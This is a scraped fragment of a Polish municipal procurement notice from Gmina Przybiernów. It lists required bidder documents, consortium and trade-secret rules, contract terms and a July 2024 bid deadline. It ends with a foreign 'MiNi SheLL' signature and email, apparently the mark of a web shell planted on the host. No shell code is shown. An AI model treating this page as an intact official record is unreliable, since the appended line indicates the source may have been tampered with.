zgodnie z zał nr 2.1 do SWZ dla cz nr 1, zał nr<br/>2.2 do SWZ dla części nr 2, zgodnie z zał nr 2.3 do SWZ dla części nr 3,<br/>Dla wszystkich części - Ośw wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy<br/>kapitałowej,z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w<br/>postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami<br/>potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od<br/>innego wykonawcy należącego do tej samej grupy kapitałowej – z zał nr 8.1 do SWZ dla części nr 1, zał nr 8.2 do SWZ dla części nr<br/>2, zał nr 8.3 do SWZ dla części nr 3<br/>2. Część nr 1, 2,<br/>1) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest<br/>krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te<br/>zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym<br/>dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane<br/>zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne<br/>odpowiednie dokumenty- zgodnie z zał nr 5.1 do SWZ dla części nr 1, zgodnie z zał nr 5.2 do SWZ dla części nr 2,<br/>2) wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za<br/>świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji<br/>zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu<br/>wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami – zgodnie z zał nr 6.1 do SWZ dla<br/>części nr 1, zgodnie z zał nr 6.2 do SWZ dla części nr 2, zgodnie z zał nr 6.3 do SWZ dla części nr 3,<br/>3. Część nr 3<br/>1) wykazu usług wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat<br/>przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia<br/>działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których<br/>usługi zostały wykonane, oraz załączeniem dowodów określających czy te usługi zostały wykonane lub są wykonywane należycie,<br/>przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były<br/>wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym<br/>charakterze wykonawca nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy; w przypadku świadczeń<br/>okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny<br/>być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu; - zgodnie z zał nr 5.3 do SWZ dla części nr 3.<br/>2) wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za<br/>świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji<br/>zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu<br/>wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami – zgodnie z zał nr 6.3 do SWZ dla<br/>części nr 3.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Na ofertę składają się:<br/>1) Dokumenty składane przez wszystkich wykonawców<br/>a) formularz ofertowy odpowiednio dla danej części na którą wykonawca składa ofertę przygotowany - zgodnie z<br/>załącznikiem nr 1.1 do SWZ dla części nr 1, załącznikiem nr 1.2 do SWZ dla części nr 2, załącznikiem nr 1.3 do SWZ dla<br/>części nr 3.<br/>b) oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu odpowiednio dla danej części na którą<br/>wykonawca składa ofertę przygotowane - zgodnie z załącznikiem nr 2.1 do SWZ dla części nr 1, załącznikiem nr 2.2 do<br/>SWZ dla części nr 2, załącznikiem nr 2.3 do SWZ dla części nr 3.<br/>c) oświadczenie o braku podstaw do wykluczenia z postępowania odpowiednio dla danej części na którą wykonawca składa<br/>ofertę przygotowane - zgodnie z załącznikiem nr 3.1 do SWZ dla części nr 1, załącznikiem nr 3.2 do SWZ dla części nr 2,<br/>załącznikiem nr 3.3 do SWZ dla części nr 3.<br/>d) pełnomocnictwo upoważniające do złożenia oferty, o ile ofertę składa pełnomocnik;<br/>e) pełnomocnictwo dla pełnomocnika do reprezentowania w postępowaniu Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia - dotyczy ofert składanych przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>(jeżeli dotyczy);<br/>f) zobowiązanie podmiotu udostępniającego zasoby Wykonawcy odpowiednio dla danej części na którą wykonawca składa<br/>ofertę przygotowany - zgodnie z załącznikiem nr 7.1 do SWZ dla części nr 1, załącznikiem nr 7.2 do SWZ dla części nr 2,<br/>załącznikiem nr 7.3 do SWZ dla części nr 3 (jeżeli dotyczy);<br/>g) oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz<br/>odpowiednio spełnienie warunków udziału w postępowaniu – odpowiednio dla danej części na którą wykonawca składa<br/>ofertę przygotowany zgodnie z załącznikiem nr 4.1 do SWZ dla części nr 1, załącznikiem nr 4.2 do SWZ dla części nr 2,<br/>załącznikiem nr 4.3 do SWZ dla części nr 3 (jeżeli dotyczy); <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 15.16. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>15.16.1 Wykonawcy składający ofertę wspólną ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o<br/>udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy. Do oferty wspólnej Wykonawcy dołączają<br/>pełnomocnictwo.<br/>15.16.2 Pełnomocnik pozostaje w kontakcie z Zamawiającym w toku postępowania i do niego Zamawiający kieruje<br/>informacje, korespondencję, itp.<br/>15.16.3 Oferta wspólna, składana przez dwóch lub więcej Wykonawców, powinna spełniać następujące wymagania:<br/>a) oferta wspólna powinna być sporządzona zgodnie z SWZ,<br/>b) sposób składania dokumentów w ofercie wspólnej:<br/> dokumenty, dotyczące własnej firmy, takie jak np.: oświadczenie o braku podstaw do wykluczenia składa każdy z<br/>Wykonawców składających ofertę wspólną we własnym imieniu;<br/> dokumenty wspólne takie jak np.: formularz ofertowy, dokumenty podmiotowe i przedmiotowe składa pełnomocnik<br/>Wykonawców w imieniu wszystkich Wykonawców składających ofertę wspólną.<br/>15.17. Przed podpisaniem umowy (w przypadku wygrania postępowania) Wykonawcy składający ofertę wspólną będą mieli<br/>obowiązek przedstawić Zamawiającemu umowę konsorcjum, zawierającą, co najmniej:<br/>a) zobowiązanie do realizacji wspólnego przedsięwzięcia gospodarczego obejmującego swoim zakresem realizację<br/>przedmiotu zamówienia,<br/>b) określenie zakresu działania poszczególnych stron umowy,<br/>c) czas obowiązywania umowy, który nie może być krótszy, niż okres obejmujący realizację zamówienia oraz czas trwania<br/>gwarancji jakości i rękojmi.<br/>15.18. Jeśli oferta zawiera informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu ustawy z dnia 16 kwietnia 1993<br/>r. o zwalczaniu nieuczciwej konkurencji (Dz. U. z 2022 r. poz. 1233 z poź zm.), Wykonawca powinien nie później niż w<br/>terminie składania ofert, zastrzec, że nie mogą one być udostępnione oraz wykazać, iż zastrzeżone informacje stanowią<br/>tajemnicę przedsiębiorstwa.<br/>15.19. Jeżeli oferta zawiera informacje stanowiące tajemnice przedsiębiorstwa w rozumieniu przepisów art. 11 ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji (Dz. U. z 2022 r. poz.1233 z póź. zm.), wówczas informacje te muszą być wyodrębnione (zawarte) w osobnym pliku i zawierać wyraźne zastrzeżenie, że nie mogą być udostępnione. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia zostały określone w projektowanych postanowieniach<br/>umowy, które stanowią załącznik nr 9.1, 9.2, 9.3 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-07-31 10:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pośrednictwem Platformy Przetargowej Gminy Przybiernów https://przybiernow.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-07-31 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamawiający na podstawie art. 95 ustawy Prawo zamówień publicznych wymaga zatrudnienia przez Wykonawcę lub<br/>podwykonawcę na podstawie umowy o pracę osób wykonujących czynności w zakresie realizacji zamówienia, jeżeli<br/>wykonanie tych czynności polega na wykonywaniu pracy w sposób określony w art. 22 § 1 ustawy z dnia 26 czerwca 1974 r.<br/>Kodeks pracy (t.j. Dz. U. z 2023 r. poz. 1465 ze zm.).<br/>Zamawiający wymaga zatrudnienia na podstawie umowy o pracę przez Wykonawcę lub Podwykonawcę osób<br/>wykonujących wskazane poniżej czynności w trakcie realizacji zamówienia :<br/>1. Dla części nr 1,2,<br/>czynności związane z obsługą sprzętu budowlanego,<br/>2. Dla części nr 3<br/>czynności związane z obsługą biurową i administracyjną inspektorów nadzoru,<br/>Z postępowania o udzielenie zamówienia wyklucza się Wykonawcę w przypadkach, o których mowa w art. 7 ust. 1<br/>ustawy z dnia 13 kwietnia 2022r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę<br/>oraz służących ochronie bezpieczeństwa narodowego (Dz.U.2022, poz.835)

Creat By MiNi SheLL
Email: jattceo@gmail.com